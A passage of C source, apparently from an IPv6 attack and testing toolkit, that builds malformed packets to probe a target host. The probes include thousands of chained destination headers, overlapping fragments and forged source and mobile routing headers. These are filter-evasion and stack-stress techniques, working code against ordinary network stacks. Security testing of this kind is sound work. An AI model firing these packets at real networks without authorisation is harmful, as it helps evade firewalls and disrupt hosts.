(thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, 130, 0, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: 128 hop-by-hop headers\t\t\t", count); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(bla, count % 256, sizeof(bla)); memset(buf, 0, sizeof(buf)); buf[0] = NXT_IGNORE; buf[1] = 0; for (i = 0; i < 128; i++) if (thc_add_hdr_hopbyhop(pkt, &pkt_len, (unsigned char *) &buf, 6) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); 
if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, 130, 1200, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: destination ignore option\t\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); buf[0] = NXT_IGNORE; buf[1] = 0; if (thc_add_hdr_dst(pkt, &pkt_len, (unsigned char *) &buf, 6) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, 100, 0, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: destination ignore option 2kb size\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(bigbla, 0, sizeof(bigbla)); bigbla[0] = NXT_IGNORE; bigbla[1] = 0; if (thc_add_hdr_dst(pkt, &pkt_len, (unsigned char *) &bigbla, 2046) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; hdr = (thc_ipv6_hdr *) pkt; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_send_as_fragment6(interface, src6, dst6, NXT_DST, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, hdr->pkt_len > fragsize ? 
fragsize : (((hdr->pkt_len - 40 - 14) / 16) + 1) * 8) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, 100, 0, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: 2 destination headers\t\t\t", count); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(bla, count % 256, sizeof(bla)); memset(buf, 0, sizeof(buf)); buf[0] = NXT_IGNORE; buf[1] = 0; for (i = 0; i < 2; i++) if (thc_add_hdr_dst(pkt, &pkt_len, (unsigned char *) &buf, 6) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, 130, 0, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: 128 destination headers\t\t", count); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(bla, count % 256, sizeof(bla)); memset(buf, 0, sizeof(buf)); buf[0] = NXT_IGNORE; buf[1] = 0; for (i = 0; i < 128; i++) if (thc_add_hdr_dst(pkt, &pkt_len, (unsigned char *) &buf, 6) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, 130, 1200, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: 2000 destination headers\t\t", count); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, 
&pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(bla, count % 256, sizeof(bla)); memset(buf, 0, sizeof(buf)); buf[0] = NXT_IGNORE; buf[1] = 0; for (i = 0; i < 2000; i++) if (thc_add_hdr_dst(pkt, &pkt_len, (unsigned char *) &buf, 6) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; hdr = (thc_ipv6_hdr *) pkt; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_send_as_fragment6(interface, src6, dst6, NXT_DST, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, hdr->pkt_len > fragsize ? fragsize : (((hdr->pkt_len - 40 - 14) / 16) + 1) * 8) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, 130, 1200, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: 8172 destination headers\t\t", count); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(bla, count % 256, sizeof(bla)); memset(buf, 0, sizeof(buf)); buf[0] = NXT_IGNORE; buf[1] = 0; for (i = 0; i < 8172; i++) if (thc_add_hdr_dst(pkt, &pkt_len, (unsigned char *) &buf, 6) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; hdr = (thc_ipv6_hdr *) pkt; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_send_as_fragment6(interface, src6, dst6, NXT_DST, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, hdr->pkt_len > fragsize ? 
fragsize : (((hdr->pkt_len - 40 - 14) / 16) + 1) * 8) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, 130, 1200, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: correct fragmentation\t\t\t", count); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(bla, count % 256, sizeof(bla)); thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, sizeof(bla), 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; hdr = (thc_ipv6_hdr *) pkt; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, hdr->pkt_len > fragsize ? fragsize : (((hdr->pkt_len - 40 - 14) / 16) + 1) * 8) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_FRAG, NXT_ICMP6, NXT_FRAG, NXT_ICMP6, fragsize - 100, 0, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: one-shot fragmentation\t\t\t", count); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_oneshotfragment(pkt, &pkt_len, getpid() + 70000) < 0) return -1; memset(bla, count % 256, sizeof(bla)); thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, fragsize - 100, 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; // hdr = (thc_ipv6_hdr *) pkt; // while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); // if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, // hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, hdr->pkt_len > fragsize ? 
fragsize : (((hdr->pkt_len - 40 - 14) / 16) + 1) * 8) < 0) // return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, fragsize - 200, 0, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: overlap-first-zero fragmentation\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); buf[0] = NXT_IGNORE; buf[1] = 0; if (thc_add_hdr_dst(pkt, &pkt_len, (unsigned char *) &buf, 6) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, srcmtu - 150, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_dst(pkt2, &pkt_len2, (unsigned char *) &buf, 6) < 0) return -1; thc_add_icmp6(pkt2, &pkt_len2, ICMP6_PINGREPLY, 0, count, (unsigned char *) &bla, srcmtu - 150, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) < 0) return -1; /* frag stuff */ hdr = (thc_ipv6_hdr *) pkt; i = ((hdr->pkt_len - 40 - offset - 10) / 8) * 8; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 0, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, count)) return -1; memcpy(buf, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset); while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_add_data6(pkt3, &pkt_len3, NXT_HDR, buf, hdr->pkt_len - 40 - offset - 22)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt2; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 0, 0, count, 0, 0)) == NULL) return -1; if 
(thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 0, count)) return -1; memcpy(buf, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset); if (thc_add_data6(pkt3, &pkt_len3, NXT_HDR, buf, hdr->pkt_len - 40 - offset - 22)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore pkt3 = thc_destroy_packet(pkt3); /* lets see if it worked */ pkt = thc_destroy_packet(pkt); pkt2 = thc_destroy_packet(pkt2); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, fragsize - 200, 0, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: overlap-last-zero fragmentation\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); buf[0] = NXT_IGNORE; buf[1] = 0; if (thc_add_hdr_dst(pkt, &pkt_len, (unsigned char *) &buf, 6) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, srcmtu - 150, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_dst(pkt2, &pkt_len2, (unsigned char *) &buf, 6) < 0) return -1; thc_add_icmp6(pkt2, &pkt_len2, ICMP6_PINGREPLY, 0, count, (unsigned char *) &bla, srcmtu - 150, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) < 0) return -1; /* frag stuff */ hdr = (thc_ipv6_hdr *) pkt2; i = ((hdr->pkt_len - 40 - offset - 10) / 8) * 8; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 0, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, count)) return -1; memcpy(buf, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset); if (thc_add_data6(pkt3, &pkt_len3, NXT_HDR, buf, hdr->pkt_len - 40 - offset - 22)) return -1; while 
(thc_pcap_check(p, (char *) ignoreit, NULL) > 0); thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 0, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 0, count)) return -1; memcpy(buf, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset); if (thc_add_data6(pkt3, &pkt_len3, NXT_HDR, buf, hdr->pkt_len - 40 - offset - 22)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore pkt3 = thc_destroy_packet(pkt3); /* lets see if it worked */ pkt = thc_destroy_packet(pkt); pkt2 = thc_destroy_packet(pkt2); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, fragsize - 200, 0, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: overlap-first-dst fragmentation\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); buf[0] = NXT_IGNORE; buf[1] = 0; if (thc_add_hdr_dst(pkt, &pkt_len, (unsigned char *) &buf, 6) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, srcmtu - 150, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_dst(pkt2, &pkt_len2, (unsigned char *) &buf, 6) < 0) return -1; thc_add_icmp6(pkt2, &pkt_len2, ICMP6_PINGREPLY, 0, count, (unsigned char *) &bla, srcmtu - 150, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) < 0) return -1; /* frag stuff */ hdr = (thc_ipv6_hdr *) pkt; i = ((hdr->pkt_len - 40 - offset - 10) / 8) * 8; if ((pkt3 = thc_create_ipv6_extended(interface, 
PREFER_GLOBAL, &pkt_len3, src6, dst6, 0, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, count)) return -1; memcpy(buf, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset); if (thc_add_data6(pkt3, &pkt_len3, NXT_DST, buf, hdr->pkt_len - 40 - offset - 22)) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt2; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 0, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 1, 0, count)) return -1; memcpy(buf, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset); if (thc_add_data6(pkt3, &pkt_len3, NXT_DST, buf + 8, hdr->pkt_len - 40 - offset - 22)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore pkt3 = thc_destroy_packet(pkt3); /* lets see if it worked */ pkt = thc_destroy_packet(pkt); pkt2 = thc_destroy_packet(pkt2); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, fragsize - 200, 0, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: overlap-last-dst fragmentation\t\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); buf[0] = NXT_IGNORE; buf[1] = 0; if (thc_add_hdr_dst(pkt, &pkt_len, (unsigned char *) &buf, 6) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, srcmtu - 150, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_dst(pkt2, &pkt_len2, (unsigned char *) &buf, 6) < 0) return -1; 
thc_add_icmp6(pkt2, &pkt_len2, ICMP6_PINGREPLY, 0, count, (unsigned char *) &bla, srcmtu - 150, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) < 0) return -1; /* frag stuff */ hdr = (thc_ipv6_hdr *) pkt2; i = ((hdr->pkt_len - 40 - offset - 10) / 8) * 8; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 0, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, count)) return -1; memcpy(buf, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset); if (thc_add_data6(pkt3, &pkt_len3, NXT_DST, buf, hdr->pkt_len - 40 - offset - 22)) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 0, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 1, 0, count)) return -1; memcpy(buf, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset); if (thc_add_data6(pkt3, &pkt_len3, NXT_DST, buf + 8, hdr->pkt_len - 40 - offset - 22)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore pkt3 = thc_destroy_packet(pkt3); /* lets see if it worked */ pkt = thc_destroy_packet(pkt); pkt2 = thc_destroy_packet(pkt2); if (check_for_reply(p, NXT_ICMP6, ICMP6_PINGREPLY, NXT_ICMP6, ICMP6_PINGREPLY, fragsize - 200, 0, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: source-routing (done)\t\t\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; routers[0] = src6; // route via ourself, but routers[1] = NULL; // telling the target that this was already performed if (thc_add_hdr_route(pkt, &pkt_len, routers, 0) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, 
ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if ((k = check_for_reply(p, NXT_ROUTE, NXT_ICMP6, NXT_ICMP6, ICMP6_PINGREPLY, 100, 0, bla))) { tests[count] = 1; if (k == 2 && use_srcroute_type < 0) use_srcroute_type = count; } } count++; if (test == 0 || test == count) { printf("Test %2d: source-routing (todo)\t\t\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; routers[0] = src6; // route via ourself, and routers[1] = NULL; // telling the target that this was NOT already performed if (thc_add_hdr_route(pkt, &pkt_len, routers, 1) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if ((k = check_for_reply(p, NXT_ROUTE, NXT_ICMP6, NXT_ICMP6, ICMP6_PINGREPLY, 100, 200, bla))) { tests[count] = 1; if (k == 2 && use_srcroute_type < 0) use_srcroute_type = count; } } count++; if (test == 0 || test == count) { printf("Test %2d: unauth mobile source-route\t\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_mobileroute(pkt, &pkt_len, src6) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ROUTE, NXT_ICMP6, NXT_ICMP6, ICMP6_PINGREPLY, 100, 200, 
bla)) // XXX TODO: NOT SURE! tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: mobile+source-routing (done)\t\t", count); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(bla, 0, sizeof(bla)); bla[0] = 2; bla[1] = 1; memcpy(bla + 6, src6, 16); // 22 type, 23 routingptr, 24 reserved, 25-27 loose source routing memcpy(bla + 6 + 16 + 6, src6, 16); if (thc_add_hdr_misc(pkt, &pkt_len, NXT_ROUTE, -1, bla, 44) < 0) return -1; memset(bla, count % 256, sizeof(bla)); thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 150, 0); while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); if ((k = check_for_reply(p, NXT_ROUTE, NXT_ICMP6, NXT_ICMP6, ICMP6_PINGREPLY, 100, 200, bla))) { tests[count] = 1; if (k == 2 && use_srcroute_type < 0) use_srcroute_type = count; } } count++; if (test == 0 || test == count) { printf("Test %2d: fragmentation source-route (done)\t", count); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(bla, count % 256, sizeof(bla)); routers[0] = src6; // route via ourself, but routers[1] = NULL; // telling the target that this was already performed if (thc_add_hdr_route(pkt, &pkt_len, routers, 0) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 1220, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; hdr = (thc_ipv6_hdr *) pkt; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_send_as_fragment6(interface, src6, dst6, NXT_ROUTE, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, hdr->pkt_len > fragsize ? 
fragsize : (((hdr->pkt_len - 40 - offset) / 16) + 1) * 8) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ROUTE, NXT_ICMP6, NXT_ICMP6, ICMP6_PINGREPLY, 250, 0, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: fragmentation source-route (todo)\t", count); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; memset(bla, count % 256, sizeof(bla)); routers[0] = src6; // route via ourself, but routers[1] = NULL; // telling the target that this was not performed yet if (thc_add_hdr_route(pkt, &pkt_len, routers, 1) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, 1220, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; hdr = (thc_ipv6_hdr *) pkt; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_send_as_fragment6(interface, src6, dst6, NXT_ROUTE, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, hdr->pkt_len > fragsize ? 
fragsize : (((hdr->pkt_len - 40 - offset) / 16) + 1) * 8) < 0) return -1; pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ROUTE, NXT_ICMP6, NXT_ICMP6, ICMP6_PINGREPLY, 250, 0, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: hop-by-hop fragmentation source-route\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; routers[0] = src6; // route via ourself, but routers[1] = NULL; // telling the target that this was already performed if (thc_add_hdr_route(pkt, &pkt_len, routers, 0) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, (unsigned char *) &bla, srcmtu - 150, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; /* frag stuff */ hdr = (thc_ipv6_hdr *) pkt; i = ((hdr->pkt_len - 40 - offset - 10) / 8) * 8; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 0, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); buf[0] = NXT_IGNORE; buf[1] = 0; if (thc_add_hdr_hopbyhop(pkt3, &pkt_len3, (unsigned char *) &buf, 6) < 0) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 0, count)) return -1; memcpy(buf, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset); if (thc_add_data6(pkt3, &pkt_len3, NXT_ROUTE, buf, hdr->pkt_len - 40 - offset)) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore pkt3 = thc_destroy_packet(pkt3); /* lets see if it worked */ pkt = thc_destroy_packet(pkt); if (check_for_reply(p, NXT_ROUTE, NXT_ICMP6, NXT_ICMP6, ICMP6_PINGREPLY, fragsize - 200, 0, bla)) tests[count] = 1; } count++; if (test == 0 || test == count) { printf("Test %2d: destination fragmentation source-route\t", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, 
